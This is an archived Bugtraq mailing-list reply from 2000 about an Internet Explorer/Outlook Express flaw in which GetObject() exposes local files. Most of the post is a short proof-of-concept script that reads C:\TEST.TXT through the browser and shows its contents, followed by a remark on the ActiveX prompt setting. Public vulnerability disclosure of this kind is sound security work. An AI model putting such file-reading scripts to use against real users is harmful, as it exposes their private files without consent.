Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: IE 5.5/Outlook Express security vulnerability - GetObject() expose user's files
From: Fabrice Prémel <fabrice () KESKIYA FR>
Date: Wed, 27 Sep 2000 12:03:34 GMT

------getobject1.html--------------------------------
<SCRIPT>
alert("This script reads C:\\TEST.TXT\nYou may need to create it");
a=GetObject("c:\\test.txt","htmlfile");
setTimeout("alert(a.body.innerText);",2000);
</SCRIPT>
-----------------------------------------------------

Just a quick note : if you have configured explorer so that it asks
you before executing ActiveX, it will prompt you before executing the
above script.
Tested on IE5.0/Win2000.

Fabrice.


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]